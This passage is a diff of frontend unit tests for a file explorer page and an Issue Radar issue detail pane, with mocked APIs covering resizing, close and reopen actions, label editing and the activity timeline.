+  it('shows no branch when the folder is outside any repo', async () => {
+    vi.mocked(fileExplorerApi.gitStatus).mockResolvedValue({
+      repoRoot: '/somewhere/else', branch: 'unrelated', statuses: {},
+    })
+    renderPage()
+    await ready()
+    await waitFor(() => expect(fileExplorerApi.gitStatus).toHaveBeenCalled())
+    expect(screen.queryByText('unrelated')).not.toBeInTheDocument()
+  })
+})
+
+// ─── resizer ────────────────────────────────────────────────────────────────
+
+describe('FileExplorerPage pane resizer', () => {
+  const handle = () => screen.getByLabelText('Resize panel')
+
+  it('widens the left pane as the handle is dragged', async () => {
+    renderPage()
+    await ready()
+    expect(leftPx()).toBe('280px')
+    fireEvent.pointerDown(handle(), { clientX: 300, pointerId: 1 })
+    // threshold 0 → the drag commits on pointer-down and sets the resize cursor.
+    expect(document.body.style.cursor).toBe('col-resize')
+    act(() => { fireEvent.pointerMove(handle(), { clientX: 380, pointerId: 1 }) })
+    expect(leftPx()).toBe('360px')
+    act(() => { fireEvent.pointerUp(handle(), { clientX: 380, pointerId: 1 }) })
+    expect(document.body.style.cursor).toBe('')
+  })
+
+  it('clamps the pane to its minimum and maximum width', async () => {
+    renderPage()
+    await ready()
+    fireEvent.pointerDown(handle(), { clientX: 300, pointerId: 1 })
+    act(() => { fireEvent.pointerMove(handle(), { clientX: -5000, pointerId: 1 }) })
+    expect(leftPx()).toBe('180px')
+    act(() => { fireEvent.pointerMove(handle(), { clientX: 5000, pointerId: 1 }) })
+    expect(leftPx()).toBe('640px')
+    act(() => { fireEvent.pointerUp(handle(), { clientX: 5000, pointerId: 1 }) })
+  })
+
+  it('clears the global resize cursor if the pane unmounts mid-drag', async () => {
+    const { unmount } = renderPage()
+    await ready()
+    fireEvent.pointerDown(handle(), { clientX: 300, pointerId: 1 })
+    expect(document.body.style.cursor).toBe('col-resize')
+    // onEnd can never fire now, so the unmount guard is the only cleanup.
+    unmount()
+    expect(document.body.style.cursor).toBe('')
+  })
+})
+
+// ─── backend banner ─────────────────────────────────────────────────────────
+
+describe('FileExplorerPage backend banner', () => {
+  it('surfaces a health failure that happens after the page has initialized', async () => {
+    const { qc } = renderPage()
+    await ready()
+    vi.mocked(fileExplorerApi.health).mockRejectedValue(new Error('connection refused'))
+    await act(async () => {
+      await qc.refetchQueries({ queryKey: ['file-explorer', 'health'] }).catch(() => {})
+    })
+    // Cached data keeps the page initialized, so the banner is reachable.
+    await waitFor(() => expect(screen.getByText(/Backend not reachable/)).toBeInTheDocument())
+    expect(screen.getByText(/connection refused/)).toBeInTheDocument()
+  })
+})

--- a/website/src/test/IssueRadarIssueDetailCoverage.test.tsx
+++ b/website/src/test/IssueRadarIssueDetailCoverage.test.tsx
@@ -1,0 +1,879 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render, screen, waitFor, within } from '@testing-library/react'
+import userEvent from '@testing-library/user-event'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+
+import type {
+  Issue, IssueDetailData, IssueDetailResponse, IssueAiResponse,
+  IssuesResponse, Reactions, TimelineEvent,
+} from '../apps/issue-radar/api'
+
+// Behaviour pins for the ISSUE detail pane (IssueDetail.tsx) — the right column
+// of Kiro Crew's Issue Radar issues surface. Its sibling PrDetail is pinned by
+// IssueRadarPrDetailCoverage.test.tsx; this file covers the parts that are
+// issue-specific and therefore have no analogue there.
+//
+// What these cover, and why each one is load-bearing:
+//
+//  * State pill precedence splits CLOSED on state_reason. "Closed" and "Closed
+//    as not planned" are different triage answers, and collapsing them would
+//    report a wontfix as shipped.
+//  * The close control is a two-step menu, and it is withheld on a read-only
+//    repo AND while the state is still unknown. A placeholder row opened from a
+//    cross-reference has no state, so offering "Close as completed" there would
+//    let a blind write overwrite an existing state_reason.
+//  * Both writes patch the react-query caches by hand rather than invalidating,
+//    and each patch is scoped by repo. An unscoped write would rewrite another
+//    repo's issue that happens to share the number, and the state patch must
+//    touch BOTH the open and closed list caches.
+//  * Cross-references are lifted OFF the activity rail into their own "Linked"
+//    section, deduped by target URL. A same-repo row opens the in-app reference
+//    sheet; a foreign-repo row stays a plain provider link. Modified clicks must
+//    remain the browser's.
+//  * The activity rail renders NEWEST-FIRST, so a reversal bug reads as a
+//    reverse-chronological history that looks plausible.
+//  * eventVisual has one arm per timeline event kind; the self-assign arm and
+//    the two commit-bearing arms differ from their neighbours only in wording,
+//    which is exactly the kind of difference a refactor silently loses.
+//  * Untrusted URLs (a cross-reference target supplied by the provider) only
+//    become links after passing safeHttpUrl.
+//  * Empty sidebar blocks say "No one assigned" / "None yet" / "No milestone"
+//    rather than rendering nothing, so an absent value is never mistaken for a
+//    value that was never fetched.
+
+const api = {
+  issueDetail: vi.fn(),
+  issueAi: vi.fn(),
+  applyLabels: vi.fn(),
+  setIssueState: vi.fn(),
+}
+vi.mock('../apps/issue-radar/api', async (importOriginal) => ({
+  ...(await importOriginal<object>()),
+  issueRadarApi: api,
+}))
+
+const openRef = vi.fn()
+const ctx = { value: {} as Record<string, unknown> }
+vi.mock('../apps/issue-radar/context', () => ({ useIssueRadar: () => ctx.value }))
+
+// Children are stubbed: each owns its own queries / markdown pipeline and is
+// pinned by its own file. What matters here is WHICH props this pane hands them.
+vi.mock('../apps/issue-radar/components/RefMarkdown', () => ({
+  default: ({ content }: { content: string }) => <div data-testid="md">{content}</div>,
+}))
+vi.mock('../apps/issue-radar/components/InvestigateButton', () => ({
+  default: ({ issue }: { issue: Issue }) => <div>{`investigate:${issue.title}`}</div>,
+}))
+vi.mock('../apps/issue-radar/components/AiSummaryCard', () => ({
+  default: (p: {
+    summary: string; fromCache: boolean; loading: boolean; fetching: boolean
+    error: Error | null; onRegenerate: () => void; generatedAt: string | null
+  }) => (
+    <div>
+      <span data-testid="ai-state">
+        {`${p.loading ? 'loading' : 'idle'}|${p.fromCache ? 'cached' : 'fresh'}`}
+        {`|${p.error ? p.error.message : 'no-error'}|${p.generatedAt ?? 'unstamped'}`}
+      </span>
+      <span data-testid="ai-summary">{p.summary}</span>
+      <button type="button" onClick={p.onRegenerate}>regenerate-ai</button>
+    </div>
+  ),
+}))
+vi.mock('../apps/issue-radar/components/LabelPicker', () => ({
+  default: ({ labels, selected, onToggle }: {
+    labels: { name: string }[]; selected: string[]; onToggle: (n: string) => void
+  }) => (
+    <div>
+      <span data-testid="picker-selected">{selected.join(',') || 'none'}</span>
+      {labels.map((l) => (
+        <button key={l.name} type="button" onClick={() => onToggle(l.name)}>{`pick:${l.name}`}</button>
+      ))}
+    </div>
+  ),
+}))
+
+const IssueDetail = (await import('../apps/issue-radar/components/IssueDetail')).default
+
+const REF = { owner: 'kirodotdev', repo: 'Kiro' }
+const SCOPE = 'github:github.com:kirodotdev/Kiro'
+const OTHER_SCOPE = 'github:github.com:kirodotdev/Other'
+
+const ROW: Issue = {
+  number: 11,
+  title: 'Row title',
+  url: 'https://github.com/kirodotdev/Kiro/issues/11',
+  labels: ['from-row'],
+  comments: 2,
+  author: 'alice',
+  author_association: 'MEMBER',
+  state: 'open',
+  assignees: ['dave'],
+  body: 'Row body',
+  created_at: '2026-07-01T00:00:00Z',
+  updated_at: '2026-07-02T00:00:00Z',
+}
+
+/** A pane opened from a cross-reference: a number and nothing else. */
+const PLACEHOLDER: Issue = {
+  number: 11, title: '', url: '', labels: [], comments: 0, updated_at: '',
+}
+
+function reactions(over: Partial<Reactions> = {}): Reactions {
+  return {
+    total: 0, plus1: 0, minus1: 0, laugh: 0, hooray: 0,
+    confused: 0, heart: 0, rocket: 0, eyes: 0, ...over,
+  }
+}
+
+function detailData(over: Partial<IssueDetailData> = {}): IssueDetailData {
+  return {
+    number: 11,
+    title: 'Detail title',
+    body: 'The description body',
+    state: 'open',
+    state_reason: null,
+    url: 'https://github.com/kirodotdev/Kiro/issues/11#detail',
+    author: 'alice',
+    author_association: 'MEMBER',
+    created_at: '2026-07-01T00:00:00Z',
+    updated_at: '2026-07-02T00:00:00Z',
+    closed_at: null,
+    closed_by: null,
+    comments: 2,
+    locked: false,
+    labels: [{ name: 'bug', color: 'ff0000', description: '' }],
+    assignees: ['dave'],
+    milestone: { title: 'v1.0', state: 'open', due_on: null },
+    reactions: reactions({ total: 3, plus1: 2, heart: 1 }),
+    ...over,
+  }
+}
+
+function response(over: Partial<IssueDetailResponse> = {}): IssueDetailResponse {
+  return {
+    owner: REF.owner,
+    repo: REF.repo,
+    number: 11,
+    detail: detailData(),
+    timeline: [],
+    from_cache: false,
+    ...over,
+  }
+}
+
+function ai(over: Partial<IssueAiResponse> = {}): IssueAiResponse {
+  return {
+    owner: REF.owner,
+    repo: REF.repo,
+    number: 11,
+    summary: 'AI triage summary',
+    suggested_labels: [],
+    generated_at: '2026-07-02T01:00:00Z',
+    from_cache: true,
+    ...over,
+  }
+}
+
+function ev(over: Partial<TimelineEvent> & { kind: TimelineEvent['kind'] }): TimelineEvent {
+  return { actor: 'alice', created_at: '2026-07-02T00:00:00Z', ...over }
+}
+
+function renderPane(issue: Issue = ROW) {
+  const qc = new QueryClient({ defaultOptions: { queries: { retry: false } } })
+  const view = render(
+    <QueryClientProvider client={qc}>
+      <IssueDetail issue={issue} />
+    </QueryClientProvider>,
+  )
+  const header = () => view.container.querySelector('header') as HTMLElement
+  const sidebar = () => view.container.querySelector('aside') as HTMLElement
+  const main = () => view.container.querySelector('main') as HTMLElement
+  return { qc, header, sidebar, main, ...view }
+}
+
+/** The sidebar block whose uppercase heading is `title`. */
+function block(sidebar: HTMLElement, title: string): HTMLElement {
+  const heading = within(sidebar).getByText(title)
+  return heading.parentElement!.parentElement as HTMLElement
+}
+
+const writeText = vi.fn()
+
+beforeEach(() => {
+  vi.clearAllMocks()
+  writeText.mockResolvedValue(undefined)
+  // happy-dom's navigator.clipboard is getter-only; defineProperty replaces it.
+  Object.defineProperty(navigator, 'clipboard', { value: { writeText }, configurable: true })
+  ctx.value = {
+    active: REF,
+    colorByName: new Map([['bug', 'ff0000'], ['needs-info', '00ff00']]),
+    memberRoleByLogin: new Map([['alice', 'admin']]),
+    repoLabels: [
+      { name: 'bug', color: 'ff0000', description: '' },
+      { name: 'needs-info', color: '00ff00', description: '' },
+    ],
+    countByLabel: new Map([['bug', 4]]),
+    canWrite: true,
+    stateFilter: 'open',
+    refreshPrefs: { detailPollMs: 30_000, pollInBackground: false },
+    openRef,
+  }
+  api.issueDetail.mockResolvedValue(response())
+  api.issueAi.mockResolvedValue(ai())
+})
+
+afterEach(() => vi.clearAllMocks())
+
+describe('IssueDetail — header and first paint', () => {
+  it('paints the detail title, identity, and the action affordances', async () => {
+    const { header } = renderPane()
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+
+    const h = header()
+    // The #number links out to the provider, using the detail URL once it lands.
+    expect(within(h).getByRole('link', { name: '#11' }).getAttribute('href'))
+      .toBe('https://github.com/kirodotdev/Kiro/issues/11#detail')
+    expect(within(h).getByText('Open')).toBeTruthy()
+    expect(within(h).getByText('alice')).toBeTruthy()
+    // Admin comes from the authoritative roster, not author_association.
+    expect(within(h).getByText('Admin')).toBeTruthy()
+    expect(screen.getByText('investigate:Detail title')).toBeTruthy()
+    // The AI read is its own query, so it can land after the detail heading
+    // does -- wait on its content rather than assuming a single flush covers
+    // both. Asserting it synchronously passes on a fast machine and races on CI.
+    await waitFor(() => expect(screen.getByTestId('ai-summary').textContent).toBe('AI triage summary'))
+    expect(screen.getByTestId('ai-state').textContent).toBe('idle|cached|no-error|2026-07-02T01:00:00Z')
+  })
+
+  it('paints from the list row before the detail read lands', async () => {
+    let release: (v: IssueDetailResponse) => void = () => {}
+    api.issueDetail.mockImplementation(() => new Promise<IssueDetailResponse>((res) => { release = res }))
+    const { header, sidebar } = renderPane()
+
+    expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Row title')
+    expect(within(header()).getByRole('link', { name: '#11' }).getAttribute('href'))
+      .toBe('https://github.com/kirodotdev/Kiro/issues/11')
+    // The row carries only label NAMES, so the chip is synthesized against the
+    // repo colour map — a name the map does not know falls back to neutral grey.
+    expect(within(sidebar()).getByText('from-row')).toBeTruthy()
+
+    release(response())
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+    // The authoritative label objects replace the synthesized ones.
+    expect(within(sidebar()).queryByText('from-row')).toBeNull()
+    expect(within(sidebar()).getByText('bug')).toBeTruthy()
+  })
+
+  it('shows skeletons instead of fabricated values for a placeholder row', async () => {
+    let release: (v: IssueDetailResponse) => void = () => {}
+    api.issueDetail.mockImplementation(() => new Promise<IssueDetailResponse>((res) => { release = res }))
+    renderPane(PLACEHOLDER)
+
+    // No heading, no "someone opened", no "No description provided" — and no
+    // Investigate button, whose seed prompt names the issue by title.
+    expect(screen.queryByRole('heading', { level: 1 })).toBeNull()
+    expect(screen.queryByText('No description provided.')).toBeNull()
+    expect(screen.queryByText(/^investigate:/)).toBeNull()
+
+    release(response())
+    await waitFor(() => expect(screen.getByText('investigate:Detail title')).toBeTruthy())
+  })
+
+  it('marks a locked issue and renders the empty-body fallback', async () => {
+    api.issueDetail.mockResolvedValue(response({
+      detail: detailData({ locked: true, body: '   ', reactions: null }),
+    }))
+    const { header } = renderPane({ ...ROW, body: '' })
+    await waitFor(() => expect(within(header()).getByText('locked')).toBeTruthy())
+    expect(screen.getByText('No description provided.')).toBeTruthy()
+  })
+
+  it('copies the detail url to the clipboard and flips to a confirmation', async () => {
+    // Deliberately NOT userEvent.setup(): its own clipboard stub would replace
+    // the spy installed above, and the write under test would land there.
+    renderPane()
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+
+    const copy = screen.getByRole('button', { name: 'Copy link to this issue' })
+    await userEvent.click(copy)
+    expect(writeText).toHaveBeenCalledWith('https://github.com/kirodotdev/Kiro/issues/11#detail')
+    // The tick replaces the copy glyph…
+    await waitFor(() => expect(copy.querySelector('.text-ok')).toBeTruthy())
+    expect(copy.getAttribute('title')).toBe('Link copied')
+    // …and times out back to it, so the affordance does not read as latched.
+    await waitFor(() => expect(copy.querySelector('.text-ok')).toBeNull(), { timeout: 4000 })
+  })
+
+  it('survives a clipboard that refuses the write', async () => {
+    writeText.mockRejectedValue(new Error('blocked'))
+    renderPane()
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+
+    const copy = screen.getByRole('button', { name: 'Copy link to this issue' })
+    await userEvent.click(copy)
+    await waitFor(() => expect(writeText).toHaveBeenCalled())
+    // No tick — the copy did not happen, so nothing claims it did.
+    expect(copy.querySelector('.text-ok')).toBeNull()
+    expect(copy.getAttribute('title')).toBe('Copy link to this issue')
+  })
+
+  it('forces a server re-read from the refresh button and the AI regenerate', async () => {
+    const user = userEvent.setup()
+    renderPane()
+    await waitFor(() => expect(api.issueDetail).toHaveBeenCalledTimes(1))
+    // First fetch after opening is cache-first.
+    expect(api.issueDetail.mock.calls[0][2]).toEqual({ refresh: false })
+
+    await user.click(screen.getByRole('button', { name: 'Refresh issue details' }))
+    await waitFor(() => expect(api.issueDetail).toHaveBeenCalledTimes(2))
+    expect(api.issueDetail.mock.calls[1][2]).toEqual({ refresh: true })
+
+    await waitFor(() => expect(api.issueAi).toHaveBeenCalledTimes(1))
+    expect(api.issueAi.mock.calls[0][2]).toEqual({ refresh: false })
+    await user.click(screen.getByRole('button', { name: 'regenerate-ai' }))
+    await waitFor(() => expect(api.issueAi).toHaveBeenCalledTimes(2))
+    expect(api.issueAi.mock.calls[1][2]).toEqual({ refresh: true })
+  })
+})
+
+describe('IssueDetail — state pill', () => {
+  it('reads a completed close and a not-planned close differently', async () => {
+    api.issueDetail.mockResolvedValue(response({
+      detail: detailData({
+        state: 'closed', state_reason: 'completed',
+        closed_at: '2026-07-03T00:00:00Z', closed_by: 'frank',
+      }),
+    }))
+    const { header, sidebar, unmount } = renderPane()
+    await waitFor(() => expect(within(header()).getByText('Closed')).toBeTruthy())
+    // The Dates block gains a Closed row naming who closed it.
+    expect(within(block(sidebar(), 'Dates')).getByText(/frank/)).toBeTruthy()
+    unmount()
+
+    api.issueDetail.mockResolvedValue(response({
+      detail: detailData({ state: 'closed', state_reason: 'not_planned' }),
+    }))
+    const second = renderPane()
+    await waitFor(() => expect(
+      within(second.header()).getByText('Closed as not planned'),
+    ).toBeTruthy())
+  })
+})
+
+describe('IssueDetail — close / reopen writes', () => {
+  it('closes as completed through the two-step menu and patches both list caches', async () => {
+    const user = userEvent.setup()
+    api.setIssueState.mockResolvedValue({ state: 'closed', state_reason: 'completed' })
+    const { qc } = renderPane()
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+
+    const seed = (sf: string, scope: string) => qc.setQueryData<IssuesResponse>(
+      ['issue-radar', 'issues', scope, sf],
+      { owner: REF.owner, repo: REF.repo, issues: [{ ...ROW }], from_cache: false },
+    )
+    seed('open', SCOPE)
+    seed('closed', SCOPE)
+    seed('open', OTHER_SCOPE)
+
+    await user.click(screen.getByRole('button', { name: /Close/ }))
+    await user.click(screen.getByRole('button', { name: 'Close as completed' }))
+
+    await waitFor(() => expect(api.setIssueState).toHaveBeenCalledWith(REF, 11, 'closed', 'completed'))
+    // Both of this repo's list caches carry the new state…
+    for (const sf of ['open', 'closed']) {
+      await waitFor(() => expect(
+        qc.getQueryData<IssuesResponse>(['issue-radar', 'issues', SCOPE, sf])!.issues[0].state,
+      ).toBe('closed'))
+    }
+    // …and the other repo's identically-numbered issue is untouched.
+    expect(qc.getQueryData<IssuesResponse>(['issue-radar', 'issues', OTHER_SCOPE, 'open'])!
+      .issues[0].state).toBe('open')
+    // The detail cache is patched, so the pane reads Closed without a re-fetch.
+    await waitFor(() => expect(screen.getByText('Closed')).toBeTruthy())
+  })
+
+  it('closes as not planned from the same menu', async () => {
+    const user = userEvent.setup()
+    api.setIssueState.mockResolvedValue({ state: 'closed', state_reason: 'not_planned' })
+    renderPane()
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+
+    await user.click(screen.getByRole('button', { name: /Close/ }))
+    await user.click(screen.getByRole('button', { name: 'Close as not planned' }))
+    await waitFor(() => expect(api.setIssueState).toHaveBeenCalledWith(REF, 11, 'closed', 'not_planned'))
+    await waitFor(() => expect(screen.getByText('Closed as not planned')).toBeTruthy())
+  })
+
+  it('dismisses the close menu without writing', async () => {
+    const user = userEvent.setup()
+    renderPane()
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+
+    await user.click(screen.getByRole('button', { name: /Close/ }))
+    expect(screen.getByRole('button', { name: 'Close as completed' })).toBeTruthy()
+    await user.click(screen.getByRole('button', { name: 'Dismiss menu' }))
+    expect(screen.queryByRole('button', { name: 'Close as completed' })).toBeNull()
+    expect(api.setIssueState).not.toHaveBeenCalled()
+  })
+
+  it('offers a single Reopen on a closed issue', async () => {
+    const user = userEvent.setup()
+    api.issueDetail.mockResolvedValue(response({
+      detail: detailData({ state: 'closed', state_reason: 'completed' }),
+    }))
+    api.setIssueState.mockResolvedValue({ state: 'open', state_reason: null })
+    renderPane({ ...ROW, state: 'closed' })
+
+    const reopen = await screen.findByRole('button', { name: 'Reopen' })
+    expect(screen.queryByRole('button', { name: /^Close/ })).toBeNull()
+    await user.click(reopen)
+    await waitFor(() => expect(api.setIssueState).toHaveBeenCalledWith(REF, 11, 'open', undefined))
+    await waitFor(() => expect(screen.getByText('Open')).toBeTruthy())
+  })
+
+  it('surfaces a failed state write in the header', async () => {
+    const user = userEvent.setup()
+    api.setIssueState.mockRejectedValue(new Error('403 not a collaborator'))
+    renderPane()
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+
+    await user.click(screen.getByRole('button', { name: /Close/ }))
+    await user.click(screen.getByRole('button', { name: 'Close as completed' }))
+    expect(await screen.findByText('403 not a collaborator')).toBeTruthy()
+  })
+
+  it('withholds the close control on a read-only repo', async () => {
+    ctx.value = { ...ctx.value, canWrite: false }
+    renderPane()
+    await waitFor(() => expect(screen.getByRole('heading', { level: 1 }).textContent).toBe('Detail title'))
+    expect(screen.queryByRole('button', { name: /^Close/ })).toBeNull()
+    expect(screen.queryByRole('button', { name: 'Reopen' })).toBeNull()
+  })
+
+  it('withholds the close control until the state is actually known', async () => {
+    api.issueDetail.mockImplementation(() => new Promise<IssueDetailResponse>(() => {}))
+    renderPane(PLACEHOLDER)
+    // The placeholder has no state; `state` falls back to 'open', so an offered
+    // "Close as completed" here would be a blind write.
+    await waitFor(() => expect(screen.getByRole('button', { name: 'Refresh issue details' })).toBeTruthy())
+    expect(screen.queryByRole('button', { name: /^Close/ })).toBeNull()
+  })
+})
+
+describe('IssueDetail — labels sidebar', () => {
+  it('renders the applied labels and hides Edit when the repo has none', async () => {
+    ctx.value = { ...ctx.value, repoLabels: [] }
+    const { sidebar } = renderPane()
+    await waitFor(() => expect(within(sidebar()).getByText('bug')).toBeTruthy())
+    expect(within(sidebar()).queryByRole('button', { name: 'Edit' })).toBeNull()
+  })
+
+  it('toggles a label on and off through the picker and patches both caches', async () => {
+    const user = userEvent.setup()
+    api.applyLabels.mockResolvedValue({
+      labels: [
+        { name: 'bug', color: 'ff0000', description: '' },
+        { name: 'needs-info', color: '00ff00', description: '' },
+      ],
+    })
+    const { qc, sidebar } = renderPane()
+    await waitFor(() => expect(within(sidebar()).getByText('bug')).toBeTruthy())
+    qc.setQueryData<IssuesResponse>(
+      ['issue-radar', 'issues', SCOPE, 'open'],
+      { owner: REF.owner, repo: REF.repo, issues: [{ ...ROW }], from_cache: false },
+    )
+
+    await user.click(within(sidebar()).getByRole('button', { name: 'Edit' }))
+    expect(screen.getByTestId('picker-selected').textContent).toBe('bug')
+
+    // An unapplied label ADDS…
+    await user.click(screen.getByRole('button', { name: 'pick:needs-info' }))
+    await waitFor(() => expect(api.applyLabels)
+      .toHaveBeenCalledWith(REF, 11, ['needs-info'], []))
+    await waitFor(() => expect(screen.getByTestId('picker-selected').textContent).toBe('bug,needs-info'))
+    expect(qc.getQueryData<IssuesResponse>(['issue-radar', 'issues', SCOPE, 'open'])!
+      .issues[0].labels).toEqual(['bug', 'needs-info'])
+
+    // …an applied one REMOVES.
+    api.applyLabels.mockResolvedValue({ labels: [{ name: 'needs-info', color: '00ff00', description: '' }] })
+    await user.click(screen.getByRole('button', { name: 'pick:bug' }))
+    await waitFor(() => expect(api.applyLabels).toHaveBeenLastCalledWith(REF, 11, [], ['bug']))
+    await waitFor(() => expect(screen.getByTestId('picker-selected').textContent).toBe('needs-info'))
+
+    // Leaving edit mode returns to the read-only chips.
+    await user.click(within(sidebar()).getByRole('button', { name: 'Done' }))
+    expect(screen.queryByTestId('picker-selected')).toBeNull()
+  })
+
+  it('surfaces a failed label write', async () => {
+    const user = userEvent.setup()
+    api.applyLabels.mockRejectedValue(new Error('label write refused'))
+    const { sidebar } = renderPane()
+    await waitFor(() => expect(within(sidebar()).getByText('bug')).toBeTruthy())
+
+    await user.click(within(sidebar()).getByRole('button', { name: 'Edit' }))
+    await user.click(screen.getByRole('button', { name: 'pick:needs-info' }))
+    expect(await screen.findByText('label write refused')).toBeTruthy()
+  })
+
+  it('accepts an AI suggestion with one click and drops it once applied', async () => {
+    const user = userEvent.setup()
+    api.issueAi.mockResolvedValue(ai({
+      suggested_labels: [
+        { name: 'needs-info', reason: 'no reproduction steps' },
+        { name: 'bug', reason: 'already applied, filtered out' },
+      ],
+    }))
+    api.applyLabels.mockResolvedValue({
+      labels: [
+        { name: 'bug', color: 'ff0000', description: '' },
+        { name: 'needs-info', color: '00ff00', description: '' },
+      ],
+    })
+    const { sidebar } = renderPane()
+    await waitFor(() => expect(within(sidebar()).getByText('Suggested')).toBeTruthy())
+
+    // Only the not-yet-applied suggestion is offered, and the reason is the tip.
+    const chip = within(sidebar()).getByRole('button', { name: 'needs-info' })
+    expect(chip.getAttribute('title')).toBe('Add “needs-info” — no reproduction steps')
+    expect(within(sidebar()).queryByRole('button', { name: 'bug' })).toBeNull()
+
+    await user.click(chip)
+    await waitFor(() => expect(api.applyLabels).toHaveBeenCalledWith(REF, 11, ['needs-info'], []))
+    // Applied suggestions drop out as the detail cache updates.
+    await waitFor(() => expect(within(sidebar()).queryByText('Suggested')).toBeNull())
+  })
+
+  it('degrades suggestions to read-only on a repo without push access', async () => {
+    const user = userEvent.setup()
+    ctx.value = { ...ctx.value, canWrite: false }
+    api.issueAi.mockResolvedValue(ai({
+      suggested_labels: [{ name: 'needs-info', reason: '' }],
+    }))
+    const { sidebar } = renderPane()
+    await waitFor(() => expect(within(sidebar()).getByText('Suggested')).toBeTruthy())
+
+    expect(within(sidebar())
+      .getByText('Read-only — connect with triage/push access to apply.')).toBeTruthy()
+    const chip = within(sidebar()).getByRole('button', { name: 'needs-info' })
+    expect(chip.getAttribute('title'))
+      .toBe('Read-only — connect with triage/push access to apply')
+    await user.click(chip)
+    expect(api.applyLabels).not.toHaveBeenCalled()
+  })
+
+  it('says the suggestions are still loading while the AI read is in flight', async () => {
+    // AI is gated on the detail landing, so let the detail resolve and hold AI.
+    api.issueAi.mockImplementation(() => new Promise<IssueAiResponse>(() => {}))
+    const { sidebar } = renderPane()
+    await waitFor(() => expect(within(sidebar()).getByText('Finding suggestions…')).toBeTruthy())
+  })
+})
+
+describe('IssueDetail — sidebar metadata', () => {
+  it('renders every populated block', async () => {
+    const { sidebar } = renderPane()
+    await waitFor(() => expect(within(sidebar()).getByText('bug')).toBeTruthy())
+
+    const bar = sidebar()
+    expect(within(block(bar, 'Assignees')).getByRole('link', { name: 'dave' })
+      .getAttribute('href')).toBe('https://github.com/dave')
+    expect(within(block(bar, 'Milestone')).getByText('v1.0')).toBeTruthy()
+    expect(within(block(bar, 'Milestone')).getByText('(open)')).toBeTruthy()
+    const dates = block(bar, 'Dates')
+    expect(within(dates).getByText('Opened')).toBeTruthy()
+    expect(within(dates).getByText('Updated')).toBeTruthy()
+    expect(within(dates).queryByText('Closed')).toBeNull()
+  })
+
+  it('says "none" rather than inventing entries when the blocks are empty', async () => {
+    api.issueDetail.mockResolvedValue(response({
+      detail: detailData({ assignees: [], labels: [], milestone: null }),
+    }))
+    const { sidebar } = renderPane({ ...ROW, assignees: [], labels: [] })
+    await waitFor(() => expect(within(sidebar()).getByText('No one assigned')).toBeTruthy())
+    expect(within(sidebar()).getByText('None yet')).toBeTruthy()
+    expect(within(sidebar()).getByText('No milestone')).toBeTruthy()
+  })
+
+  it('shows the reaction strip only for emoji that actually have a count', async () => {
+    const { main } = renderPane()
+    await waitFor(() => expect(screen.getByTestId('md').textContent).toBe('The description body'))
+    // plus1: 2 and heart: 1 are populated; the other six are not rendered.
+    const strip = within(main()).getByText('2').parentElement!.parentElement as HTMLElement
+    expect(strip.textContent).toContain('2')
+    expect(strip.textContent).toContain('1')
+    expect(strip.children.length).toBe(2)
+  })
+
+  it('flips a relative timestamp to the absolute date-time when clicked', async () => {
+    const user = userEvent.setup()
+    const { sidebar } = renderPane()
+    await waitFor(() => expect(within(sidebar()).getByText('bug')).toBeTruthy())
+
+    const dates = block(sidebar(), 'Dates')
+    const opened = within(dates).getAllByRole('button')[0]
+    const relative = opened.textContent
+    await user.click(opened)
+    expect(opened.textContent).not.toBe(relative)
+    expect(opened.textContent).toBe(opened.getAttribute('title'))
+    // Keyboard is an equal path back.
+    opened.focus()
+    await user.keyboard('{Enter}')
+    expect(opened.textContent).toBe(relative)
+  })
+
+  it('renders no timestamp at all for a missing or unparseable value', async () => {
+    api.issueDetail.mockResolvedValue(response({
+      detail: detailData({ created_at: '', updated_at: 'not-a-date' }),
+    }))
+    const { sidebar } = renderPane({ ...ROW, created_at: '', updated_at: '' })
+    await waitFor(() => expect(within(sidebar()).getByText('bug')).toBeTruthy())
+
+    const dates = block(sidebar(), 'Dates')
+    // An ABSENT timestamp takes the em-dash branch…
+    expect(within(dates).getAllByText('—').length).toBe(1)
+    // …but an UNPARSEABLE one is truthy, so it reaches RelTime, which renders
+    // null: the Updated cell comes out blank rather than an em dash. Not a
+    // wrong claim (better than "Invalid Date"), but the two absences do not
+    // read alike. Pinned as-is so a deliberate change has to move this line.
+    const updatedCell = within(dates).getByText('Updated').nextElementSibling as HTMLElement
+    expect(updatedCell.textContent).toBe('')
+  })
+})
+
+describe('IssueDetail — activity timeline', () => {
+  it('orders activity newest-first and keeps the description off the rail', async () => {
+    api.issueDetail.mockResolvedValue(response({
+      timeline: [
+        ev({ kind: 'comment', actor: 'alice', body: 'oldest comment', created_at: '2026-07-02T00:00:00Z' }),
+        ev({ kind: 'comment', actor: 'bob', body: 'newest comment', created_at: '2026-07-04T00:00:00Z' }),
+      ],
+    }))
+    const { main } = renderPane()
+    await waitFor(() => expect(within(main()).getByText('newest comment')).toBeTruthy())
+
+    const bodies = within(main()).getAllByTestId('md').map((n) => n.textContent)
+    // The pinned description first (off the rail), then newest-first activity.
+    expect(bodies).toEqual(['The description body', 'newest comment', 'oldest comment'])
+    expect(within(main()).getByText('opened this issue')).toBeTruthy()
+    expect(within(main()).getAllByText('commented').length).toBe(2)
+  })
+
+  it('says so plainly when there is no activity', async () => {
+    const { main } = renderPane()
+    await waitFor(() => expect(within(main()).getByText('No activity yet.')).toBeTruthy())
+  })
+
+  it('reports a failed activity read instead of claiming there is none', async () => {
+    api.issueDetail.mockRejectedValue(new Error('rate limited'))
+    const { main } = renderPane()
+    await waitFor(() => expect(within(main()).getByText(/Couldn't load activity:/)).toBeTruthy())
+    expect(within(main()).queryByText('No activity yet.')).toBeNull()
+  })
+
+  it('renders one row per non-comment event kind', async () => {
+    api.issueDetail.mockResolvedValue(response({
+      timeline: [
